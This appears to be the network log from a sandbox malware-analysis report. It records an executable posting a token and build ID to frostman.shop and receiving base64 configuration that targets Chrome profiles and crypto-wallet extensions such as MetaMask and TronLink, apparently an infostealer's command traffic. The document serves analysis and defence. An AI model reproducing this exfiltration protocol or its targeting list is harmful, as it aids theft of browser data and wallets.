                                                                                                                                                                                                                                                                              Data Ascii: ------UKX47GDB1DJEUA1NYM79Content-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------UKX47GDB1DJEUA1NYM79Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------UKX47GDB1DJEUA1NYM79Cont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:14 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:14 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                              Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              4192.168.2.749709116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:15 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----G47GDB16FUSRIMOPZCBI
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:15 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 34 37 47 44 42 31 36 46 55 53 52 49 4d 4f 50 5a 43 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 47 34 37 47 44 42 31 36 46 55 53 52 49 4d 4f 50 5a 43 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 47 34 37 47 44 42 31 36 46 55 53 52 49 4d 4f 50 5a 43 42 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------G47GDB16FUSRIMOPZCBIContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------G47GDB16FUSRIMOPZCBIContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------G47GDB16FUSRIMOPZCBICont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:16 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:16 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                              Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              5192.168.2.749715116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:18 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----OZ5XT2689RQQIMG479H4
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 332
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:18 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 5a 35 58 54 32 36 38 39 52 51 51 49 4d 47 34 37 39 48 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 35 58 54 32 36 38 39 52 51 51 49 4d 47 34 37 39 48 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 35 58 54 32 36 38 39 52 51 51 49 4d 47 34 37 39 48 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------OZ5XT2689RQQIMG479H4Content-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------OZ5XT2689RQQIMG479H4Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------OZ5XT2689RQQIMG479H4Cont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:18 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:18 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              6192.168.2.749721116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:20 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----8Q9RQQQQ1DJMYU379R16
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 6893
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:20 UTC6893OUTData Raw: 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------8Q9RQQQQ1DJMYU379R16Content-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------8Q9RQQQQ1DJMYU379R16Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------8Q9RQQQQ1DJMYU379R16Cont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:21 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:21 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              7192.168.2.749723116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:21 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----GLX4O8QQ1DJE3EC2N7Q9
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 489
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:21 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 47 4c 58 34 4f 38 51 51 31 44 4a 45 33 45 43 32 4e 37 51 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 47 4c 58 34 4f 38 51 51 31 44 4a 45 33 45 43 32 4e 37 51 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 47 4c 58 34 4f 38 51 51 31 44 4a 45 33 45 43 32 4e 37 51 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------GLX4O8QQ1DJE3EC2N7Q9Content-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------GLX4O8QQ1DJE3EC2N7Q9Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------GLX4O8QQ1DJE3EC2N7Q9Cont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:22 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:22 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:22 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              8192.168.2.749740172.217.21.364437680C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:24 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              9192.168.2.749741172.217.21.364437680C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:24 UTC595OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIkqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:24 GMT
                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-8HFge77VN-bPv9a8qugYig' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC124INData Raw: 33 33 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6d 61 78 20 6b 65 70 6c 65 72 20 70 68 69 6c 6c 69 65 73 22 2c 22 6e 76 69 64 69 61 20 72 74 78 20 35 30 39 30 22 2c 22 74 69 6b 74 6f 6b 20 62 61 6e 6e 65 64 22 2c 22 72 65 6e 65 67 61 64 65 20 72 61 69 64 65 72 20 69 6e 20 66 6f 72 74 6e 69 74 65 22 2c 22 64 65 6e 76 65 72 20 6e 75 67 67 65 74 73 20 70 6f 72 74 6c 61 6e
                                                                                                                                                                                                                                                                              Data Ascii: 335)]}'["",["max kepler phillies","nvidia rtx 5090","tiktok banned","renegade raider in fortnite","denver nuggets portlan
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC704INData Raw: 64 20 74 72 61 69 6c 20 62 6c 61 7a 65 72 73 22 2c 22 6c 69 62 72 65 6c 61 20 66 6f 72 20 64 6f 67 73 22 2c 22 6e 79 74 20 73 74 72 61 6e 64 73 20 68 69 6e 74 73 20 64 65 63 65 6d 62 65 72 20 31 39 22 2c 22 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 20 73 6e 6f 77 20 73 74 6f 72 6d 20 6d 69 6e 6e 65 73 6f 74 61 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c
                                                                                                                                                                                                                                                                              Data Ascii: d trail blazers","librela for dogs","nyt strands hints december 19","weather forecast snow storm minnesota"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","googl
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              10192.168.2.749739172.217.21.364437680C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:24 UTC498OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIkqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:24 GMT
                                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC372INData Raw: 65 32 63 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 5c
                                                                                                                                                                                                                                                                              Data Ascii: e2c)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\
